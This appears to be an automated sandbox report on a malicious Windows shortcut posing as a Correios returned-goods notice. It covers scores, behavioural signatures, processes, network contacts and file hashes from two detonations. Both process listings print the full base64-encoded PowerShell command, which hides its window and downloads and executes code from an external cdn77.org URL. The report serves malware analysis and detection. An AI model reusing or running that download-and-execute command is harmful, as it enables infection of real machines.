Malware Analysis Report

2025-01-17 21:20

Sample ID 240603-n6j19afa25
Target 91b5f15b9b4ca90caf85b7ad83f9b396_JaffaCakes118
SHA256 c74d584e1b980f96d66d6478a42c42c0c31fd0dfebc42bf9e61d93b089de52d2
Tags
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

c74d584e1b980f96d66d6478a42c42c0c31fd0dfebc42bf9e61d93b089de52d2

Threat Level: Known bad

The file 91b5f15b9b4ca90caf85b7ad83f9b396_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary


Blocklisted process makes network request

Checks computer location settings

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 12:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 12:00

Reported

2024-06-03 12:03

Platform

win7-20240220-en

Max time kernel

120s

Max time network

121s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\agowh6in.cmdline"

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES1594.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC1593.tmp"

Network

Country Destination Domain Proto
US 8.8.8.8:53 1361227624.rsc.cdn77.org udp
GB 89.187.167.5:443 1361227624.rsc.cdn77.org tcp
GB 89.187.167.5:443 1361227624.rsc.cdn77.org tcp

Files

memory/2808-38-0x000007FEF5C1E000-0x000007FEF5C1F000-memory.dmp

memory/2808-41-0x0000000002680000-0x0000000002688000-memory.dmp

memory/2808-42-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-43-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-40-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-44-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

memory/2808-39-0x000000001B510000-0x000000001B7F2000-memory.dmp

memory/2808-45-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\agowh6in.cmdline

MD5 dd3ca3afd2053888e49366e486b0c019
SHA1 2415e38683aff17c9df3dcaadde40938e0c974f1
SHA256 122b6e87462f8d871b266c0312737e9ab44d67b97529a364602203403cbd6036
SHA512 1d2bc3efa890282f2b5ae58083f64705e08fdc6bc2cc4cef37eed3ce36c7ebbf30376439fadedd3d019a4bf5a8418af6c7703ce8c2fd821e2c976a6c7d778249

\??\c:\Users\Admin\AppData\Local\Temp\agowh6in.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

C:\Users\Admin\AppData\Local\Temp\agowh6in.pdb

MD5 fe9e2d9c0380066d48d9204dfad05a40
SHA1 55be776084a9a123634f3035a4490ed0516fb25b
SHA256 25434f644594800218e95244e8cbc3cb8a114881fb7e8f2acf5f9bce52525cdc
SHA512 a8cf1e248d4189ca605d4f540610f8646fcc4d4bfdc3f84e5cef77c4732cb9ab8d5d85156b3ff0e454db2fa251ca9d560c67f4b2b275144fce8e6a6729c7e973

memory/2808-59-0x0000000002AF0000-0x0000000002AF8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\agowh6in.dll

MD5 fa4f288d7f2f3e7e14b1163dd8cb405f
SHA1 e0158844f61b8080d3fcb579e2fd93b000a6be62
SHA256 2fc9904f574d4a60bd342c520d98e886f9cd9b2c2c66b374855c11a282ef52fd
SHA512 a88cbd2f0636764ae35a947cf2f472c123d3886e492db052b4cb68b5e087ae368000f2b4d895eea4028618c512f0edb6a273b79266537b433ac2ad08fce6e2f1

C:\Users\Admin\AppData\Local\Temp\RES1594.tmp

MD5 f8e6cf91b503bd87acfa3d23c5e97fbe
SHA1 931f606e1509ccea0c2d8009fe2fbb3345f1b52e
SHA256 b1dfd802bdc5d9349df2ae4975af0ba3596a644317aff2f02a0ff8ec6cb7e3bb
SHA512 7f0238ca0c7d448a6bd398b54711f563275cdc82fa8b935b69269d83b085a73f0c5275ab637fe587703293ec5fd4010df2278ef2345a86357e961dc8de9c7c25

\??\c:\Users\Admin\AppData\Local\Temp\CSC1593.tmp

MD5 06b749a48318b88e9fe4a103f2127872
SHA1 557a12be267032c2c60bb2c95c38c6138fd8a5f7
SHA256 5f2dcd93dc03fb60f8f0fe6a5e71be56f7c2fd68fa07f753f609d6c309d1574e
SHA512 9233efd7d4001737cc5b9c079f8892d0b31861b0db4191e6ce4de1141cc15b801f999f7210dae7310c8f1c20d0d2be12ed4d39ea07912db09e73c28ca3443199

memory/2808-62-0x000007FEF5960000-0x000007FEF62FD000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 12:00

Reported

2024-06-03 12:03

Platform

win10v2004-20240426-en

Max time kernel

91s

Max time network

95s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-540404634-651139247-2967210625-1000\Control Panel\International\Geo\Nation C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\Mercadoria_Devolvida-Correios-Y13B3EUZ.lnk

C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\windows\System32\WindowsPowerShell\v1.0\powershell.exe" -en YQBEAGQALQB0AFkAUABFACAALQBOAGEATQBFACAAQQAgAC0ATQBFAE0AYgBlAFIAZABlAGYAaQBOAEkAVABpAG8AbgAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoACwAIABpAG4AdAAgAHMAKQA7ACcAIAAtAE4AYQBtAGUAUwBQAEEAQwBFACAAQgA7AFsAQgAuAGEAXQA6ADoAUwBIAE8AdwBXAGkAbgBkAE8AVwAoACgAWwBzAFkAUwB0AGUAbQAuAGQAaQBhAEcATgBvAHMAdABpAEMAcwAuAFAAcgBvAEMAZQBzAFMAXQA6ADoARwBFAFQAYwB1AFIAcgBlAG4AVABwAFIAbwBDAGUAcwBzACgAKQAgAHwAIABQAFMAKQAuAG0AYQBJAG4AVwBJAE4ARABvAHcASABBAG4AZABsAGUALAAwACkAOwBJAEUAeAAoAE4ARQB3AC0AbwBCAGoAZQBDAHQAIABOAEUAVAAuAHcARQBCAGMAbABJAEUAbgBUACkALgBEAG8AVwBOAGwATwBhAEQAcwB0AFIASQBOAEcAKAAnAGgAdAB0AHAAcwA6AC8ALwAxADMANgAxADIAMgA3ADYAMgA0AC4AcgBzAGMALgBjAGQAbgA3ADcALgBvAHIAZwAvAHYAMgAvAGcAbAAuAHAAaABwAD8AYQBIAFIAMABjAEgATQA2AEwAeQA4AHgATQB6AFkAeABNAGoASQAzAE4AagBJADAATABuAEoAegBZAHkANQBqAFoARwA0ADMATgB5ADUAdgBjAG0AYwB2AGQAagBKADgAZAAzAEkAegBNAFEAJQAzAEQAJQAzAEQAJQAnACkA

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES441D.tmp" "c:\Users\Admin\AppData\Local\Temp\rxiqelpl\CSCFA32093BCDA5457A8F96A6E654CC4DD.TMP"

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 1361227624.rsc.cdn77.org udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
GB 89.187.167.8:443 1361227624.rsc.cdn77.org tcp
GB 89.187.167.8:443 1361227624.rsc.cdn77.org tcp
US 8.8.8.8:53 8.167.187.89.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp

Files

memory/4196-2-0x00007FFD60983000-0x00007FFD60985000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zezupish.kny.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4196-12-0x000001887B770000-0x000001887B792000-memory.dmp

memory/4196-13-0x00007FFD60980000-0x00007FFD61441000-memory.dmp

memory/4196-14-0x00007FFD60980000-0x00007FFD61441000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.0.cs

MD5 7b0e7177dfbb9edd1c1ef08b4fdfae2f
SHA1 cb11a0252cdad66ec247312ccb7feb46456e52b6
SHA256 6caf22ef995616dc37bec21b2af3aa4597cdad88e00a13de0122db3af4e9a4aa
SHA512 7322be891145e550405917757420aeb513e5689970d34647177b1a79a12c7776d4e49c129b093be9927b46bc7582c0379e0cb520af58d4410ed4c5ef98b4dbfd

\??\c:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.cmdline

MD5 b13936f927e1044e6fbcfae343fb55eb
SHA1 1772c6ab3ae7797e3db26377e0481af84817efa8
SHA256 654fb4421435548594bbfa6efa730ad4d02d9044297f2fe2e6df5f57e3bf9c30
SHA512 1eb3af8b657deb7d43b657ce3a963ba272d7789e2f09e1c3c1a9ac97874da369bd0106719d1744d79acb356c1721fd7920504010b40c2eaf98f0cc1b08d3eb7a

\??\c:\Users\Admin\AppData\Local\Temp\rxiqelpl\CSCFA32093BCDA5457A8F96A6E654CC4DD.TMP

MD5 a764751e67b4933e8bfa8cf660ec502a
SHA1 b52b846b0c1ce2d1a0d60c0204c43d50838f0a5f
SHA256 5b380f4c658006d672b43031fe31dece71b4c1e3c3bd3496a69ee4d0b6afe2bc
SHA512 ea0a1467e0023e7f7fbd6dad801b2b8242122cfdf4642c81871e74a8588c26d263036fb778e78c51bc6814d451d895f12583c83a471e214eb8a63928335c28b1

C:\Users\Admin\AppData\Local\Temp\RES441D.tmp

MD5 7e5f8cdf1324510f437f6461b8010bf1
SHA1 33d6765989cbbf97b7f3d301682e66f5e0d4ab7a
SHA256 2706269ca0ab90bcb74a8d4835c15ca3b06c1043db8dee5b7defc346e16e2963
SHA512 815b34a68398fcc9362f791282334f01470a1a0f11c3703fc7eba7e9b33a629dc57957fdeb61c156021006a59e0a165b78ff013220885c374b1ef0bdfc90d6ed

C:\Users\Admin\AppData\Local\Temp\rxiqelpl\rxiqelpl.dll

MD5 b56d5aa15b56741250e165d33432c9f2
SHA1 9e5d7f53ec98180eb82a953615f0bf07565c15de
SHA256 e29f26e8cc27ebcb82fcc3915cc148c71b9914ce88da803dba46a07f2e66d1ab
SHA512 496e57b2cb18bcf4eddf62b7aa27032da6735273384d0eb94738ff63d9ac3c8eb173a80e0c903074dd9fd9fa027ebeb0ab7e93ff6c0c9616672a4a3b83e01c32

memory/4196-27-0x0000018879570000-0x0000018879578000-memory.dmp

memory/4196-31-0x00007FFD60980000-0x00007FFD61441000-memory.dmp